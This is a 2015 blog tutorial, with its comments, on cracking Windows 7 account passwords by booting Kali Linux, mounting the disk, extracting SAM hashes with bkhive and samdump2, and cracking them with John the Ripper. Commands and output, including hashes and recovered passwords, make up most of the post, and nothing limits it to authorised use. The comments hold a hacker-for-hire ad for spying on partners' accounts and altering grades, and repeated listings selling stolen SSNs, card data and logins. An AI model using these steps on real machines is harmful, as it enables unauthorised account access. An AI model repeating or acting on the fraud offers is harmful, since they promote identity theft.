Wednesday, 6 May 2015

Crack Windows 7 passwords using Kali Linux

In this tutorial, we will use 'bkhive','samdump2', and 'John the Ripper' in Kali Linux to crack Windows 7 passwords.

For this tutorial, you need
a) Kali Linux LiveDVD
b) A Windows 7 machine

Perform the following steps:

1) Boot the machine using Kali Linux LiveDVD

2) Open the terminal window, and view the list of partitions on disk
root@kali:~# lsblk

3) Mount the Windows partition
root@kali:~# mount /dev/sda2 /mnt

4) Traverse to the SAM database directory.
root@kali:~# cd /mnt/Windows/System32/config


5) View 'SYSTEM' file in 'config' directory.
root@kali:/mnt/Windows/System32/config# ls


6) Dump the syskey bootkey from Windows System Hive 
root@kali:/mnt/Windows/System32/config# bkhive SYSTEM hive.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}
Default ControlSet: 001
Bootkey: 9055be7eb881423834eda4a7427acbe0


7) Dump the Windows password hashes.
root@kali:/mnt/Windows/System32/config# samdump2 SAM hive.txt > hash.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : CMI-CreateHive{899121E8-11D8-44B6-ACEB-301713D5ED8C}


8) View the hash file
root@kali:/mnt/Windows/System32/config# cat hash.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
shabbir:1000:aad3b435b51404eeaad3b435b51404ee:638fc14bdf05a6445d5a1e5c1f81fe5d:::
Batul:1004:aad3b435b51404eeaad3b435b51404ee:674e48b68c5cd0efd8f7e5faa87b3d1e:::
Ali:1005:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::


9) Crack password hashes using John the Ripper
root@kali:/mnt/Windows/System32/config# john --format=nt2 hash.txt
Created directory: /root/.john

Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 intrinsics 12x])
shabbir          (shabbir)
admin            (Ali)
                 (Administrator)
                 (Guest)
welcome          (Batul)
guesses: 5  time: 0:00:00:00 DONE (Thu May  7 00:05:01 2015)  c/s: 59142  trying: please - zephyr
  

16 comments:

  1. This comment has been removed by the author.

    ReplyDelete
  2. This comment has been removed by the author.

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete

  4. I have used cybergoldenhacker quite a number of times and he has never disappointed me..He does all types of mobile hack get unrestricted and unnoticeable access to your partner/spouse/anybodies facebook account,email,watsapp,textmessages.He also makes changes in any database/website such as your college/university grades..Getting the job done is as simple as sending an Email to cybergoldenhacker at gmail dot com and stating what you want to do



    Thanks.

    ReplyDelete
  5. SSN FULLZ AVAILABLE

    Fresh & valid spammed USA SSN+Dob Leads with DL available in bulk.

    >>1$ each SSN+DOB
    >>3$ each with SSN+DOB+DL
    >>5$ each for premium fullz (700+ credit score with replacement guarantee)

    Prices are negotiable in bulk order
    Serious buyer contact me no time wasters please
    Bulk order will be preferable

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    OTHER STUFF YOU CAN GET

    SSN+DOB Fullz
    CC's with CVV's (vbv & non-vbv)
    USA Photo ID'S (Front & back)

    All type of tutorials available
    (Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

    SQL Injector
    Premium Accounts (Netflix, Pornhub, etc)
    Paypal Logins
    Bitcoin Cracker
    SMTP Linux Root
    DUMPS with pins track 1 and 2
    WU & Bank transfers
    Socks, rdp's, vpn
    Php mailer
    Server I.P's
    HQ Emails with passwords
    All types of tools & tutorials.. & much more

    Looking for long term business
    For trust full vendor, feel free to contact

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    ReplyDelete
  6. SSN FULLZ AVAILABLE

    Fresh & valid spammed USA SSN+Dob Leads with DL available in bulk.

    >>1$ each SSN+DOB
    >>3$ each with SSN+DOB+DL
    >>5$ each for premium fullz (700+ credit score with replacement guarantee)

    Prices are negotiable in bulk order
    Serious buyer contact me no time wasters please
    Bulk order will be preferable

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    OTHER STUFF YOU CAN GET

    SSN+DOB Fullz
    CC's with CVV's (vbv & non-vbv)
    USA Photo ID'S (Front & back)

    All type of tutorials available
    (Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

    SQL Injector
    Premium Accounts (Netflix, Pornhub, etc)
    Paypal Logins
    Bitcoin Cracker
    SMTP Linux Root
    DUMPS with pins track 1 and 2
    WU & Bank transfers
    Socks, rdp's, vpn
    Php mailer
    Server I.P's
    HQ Emails with passwords
    All types of tools & tutorials.. & much more

    Looking for long term business
    For trust full vendor, feel free to contact

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    ReplyDelete
  7. That's a great write-up. The way you write is very nice. Thanks for this special article. Do you have any idea about the Turkish visa for US citizens ? Yes, It is a necessary permit for US Citizens to enter turkey. If you don't have a Visa you should not start your journey . Firstly you should take a visa and then start your journey . All the important information about the turkey visa is available on this page . By the 1 click you can read all the information .




    ReplyDelete